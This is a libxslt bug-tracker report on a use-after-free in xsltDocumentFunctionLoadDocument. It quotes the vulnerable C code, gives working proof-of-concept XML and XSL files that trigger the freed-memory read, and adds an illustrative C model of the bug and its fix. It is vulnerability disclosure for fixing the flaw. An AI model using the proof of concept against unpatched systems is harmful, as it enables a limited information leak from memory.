Bug 758291 - UAF in xsltDocumentFunctionLoadDocument
Status: RESOLVED FIXED
Product: libxslt
Classification: Platform
Component: general
Version: git master
Hardware: Other
OS: Linux
Priority: Normal
Severity: normal
Target Milestone: ---
Assigned To: Daniel Veillard
QA Contact: libxml QA maintainers
Depends on:
Blocks:
Reported: 2015-11-18 15:35 UTC by Sebastian Apelt
Modified: 2016-11-05 13:33 UTC
See Also:
GNOME target: ---
GNOME version: ---


Attachments
poc.tgz contains the 3 files mentioned above for reproduction (527 bytes, application/x-gzip)
2015-11-18 15:35 UTC, Sebastian Apelt

Description Sebastian Apelt 2015-11-18 15:35:34 UTC
Created attachment 315836
poc.tgz contains the 3 files mentioned above for reproduction

The UAF can be triggered via xsltproc:

sebastian@hackpot:/xslt-tests/poc$ xsltproc poc.xml
runtime error: file poc.xsl line 9 element copy-of
document() : XPointer does not select a node set: #▒▒▒▒{
no result for poc.xml

version used: 

sebastian@hackpot:/xslt-tests/poc$ xsltproc -version
Using libxml 20901, libxslt 10128 and libexslt 817
xsltproc was compiled against libxml 20901, libxslt 10128 and libexslt 817
libxslt 10128 was compiled against libxml 20901
libexslt 817 was compiled against libxml 20901

Garbage is displayed after the error message since the referenced string has been freed before. The responsible function is xsltDocumentFunctionLoadDocument in functions.c:

static void
xsltDocumentFunctionLoadDocument(xmlXPathParserContextPtr ctxt, xmlChar* URI)
{
[...]
    xmlFree(fragment);    <- FREE the fragment

    if (resObj == NULL)
	goto out_fragment;

    switch (resObj->type) {
	case XPATH_NODESET:
	    break;
	case XPATH_UNDEFINED:
	case XPATH_BOOLEAN:
	case XPATH_NUMBER:
	case XPATH_STRING:
	case XPATH_POINT:
	case XPATH_USERS:
	case XPATH_XSLT_TREE:
	case XPATH_RANGE:
	case XPATH_LOCATIONSET:
	    xsltTransformError(tctxt, NULL, NULL,
		"document() : XPointer does not select a node set: #%s\n",
		fragment);   <- Re-use it in error message
	goto out_object;
    }


poc.xml:
--------
<?xml-stylesheet href="poc.xsl" type="text/xsl"?>
<in>data.xml#xpointer(id('X')/range-to(id('Y')))</in>


poc.xsl:
--------
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
  <xsl:template match="in">
    <annotation>
      <xsl:copy-of select="."/>
      <value>
        <xsl:copy-of select="document(.)"/>
      </value>
    </annotation>
  </xsl:template>
  <xsl:template match="@*|node()">
    <xsl:apply-templates/>
  </xsl:template>
</xsl:stylesheet>


data.xml:
---------
<!DOCTYPE test [ <!ATTLIST A id ID #REQUIRED> ] >
<test>
  <A id="X"/>
  <A id="Y"/>
</test>


This bug can - to a limited extent - be abused for an information leak.

regards
-sebastian
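As an added illustration that is not code from the report or from libxslt, the C program below models the ordering defect described above: the fragment string is released and then handed to the error formatter. To make the defect observable without undefined behaviour, the example swaps xmlFree for a constructed quarantine allocator (tracked_free / is_freed, hypothetical names) that remembers released pointers, and a stand-in for xsltTransformError that refuses to read a released argument. eval_fragment is likewise a constructed stand-in for the XPointer evaluation and only decides whether the fragment selects a node set. The corrected function shows one safe ordering: report first, free afterwards.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed subset of the XPath object types used in functions.c. */
typedef enum { XPATH_NODESET, XPATH_STRING, XPATH_LOCATIONSET } xpath_type;

/* Result codes for the two load_document_* variants below (example only). */
enum { LOAD_OK = 0, LOAD_ERR_REPORTED = -1, LOAD_UAF_DETECTED = 1 };

/* Quarantine allocator (assumption for this example): freed pointers are
 * remembered and the memory is never returned, so a later use of the
 * pointer is detected instead of reading recycled heap contents. */
#define MAX_FREED 16
static const void *freed_ptrs[MAX_FREED];
static int freed_count = 0;

static void tracked_free(char *p) {
    if (freed_count < MAX_FREED)
        freed_ptrs[freed_count++] = p;
    /* intentionally not passed to free(): keeps the address unique */
}

static int is_freed(const char *p) {
    for (int i = 0; i < freed_count; i++)
        if (freed_ptrs[i] == p)
            return 1;
    return 0;
}

static char *dup_string(const char *s) {
    size_t n = strlen(s) + 1;
    char *p = malloc(n);
    if (p) memcpy(p, s, n);
    return p;
}

/* Stand-in for the XPointer evaluation: a range-to() expression yields a
 * location set, which document() rejects; anything else is a node set. */
static xpath_type eval_fragment(const char *fragment) {
    return strstr(fragment, "range-to") ? XPATH_LOCATIONSET : XPATH_NODESET;
}

/* Stand-in for xsltTransformError. Returns 1 if the argument was already
 * released, i.e. the caller is about to print freed memory. */
static int report_error(char *out, size_t n, const char *fragment) {
    if (is_freed(fragment)) {
        snprintf(out, n, "use-after-free detected: fragment already freed");
        return 1;
    }
    snprintf(out, n,
             "document() : XPointer does not select a node set: #%s\n",
             fragment);
    return 0;
}

/* Same ordering as the reported code: free, then format the message. */
int load_document_vulnerable(const char *uri_fragment, char *err, size_t n) {
    char *fragment = dup_string(uri_fragment);
    xpath_type t = eval_fragment(fragment);
    tracked_free(fragment);                 /* released here ... */
    if (t != XPATH_NODESET) {
        if (report_error(err, n, fragment)) /* ... and dereferenced here */
            return LOAD_UAF_DETECTED;
        return LOAD_ERR_REPORTED;
    }
    err[0] = '\0';
    return LOAD_OK;
}

/* Corrected ordering: the fragment outlives every use of it. */
int load_document_fixed(const char *uri_fragment, char *err, size_t n) {
    char *fragment = dup_string(uri_fragment);
    xpath_type t = eval_fragment(fragment);
    int rc = LOAD_OK;
    if (t != XPATH_NODESET) {
        rc = report_error(err, n, fragment) ? LOAD_UAF_DETECTED
                                            : LOAD_ERR_REPORTED;
    } else {
        err[0] = '\0';
    }
    tracked_free(fragment);                 /* only after the last use */
    return rc;
}

int main(void) {
    char buf[256];
    const char *frag = "xpointer(id('X')/range-to(id('Y')))"; /* from poc.xml */
    printf("vulnerable: rc=%d msg=%s\n",
           load_document_vulnerable(frag, buf, sizeof buf), buf);
    printf("fixed:      rc=%d msg=%s",
           load_document_fixed(frag, buf, sizeof buf), buf);
    return 0;
}
```

Under a real allocator the vulnerable ordering prints whatever now occupies the released buffer, which is the garbage after "#" in the xsltproc output above; tools such as AddressSanitizer flag the same read at the snprintf call.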
Comment 2 Salvatore Bonaccorso 2016-11-05 12:33:26 UTC
Hi

Can you clarify if this is the issue as referenced with the CVE-2016-1841?

Cf. https://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-1841.html

Regards,
Salvatore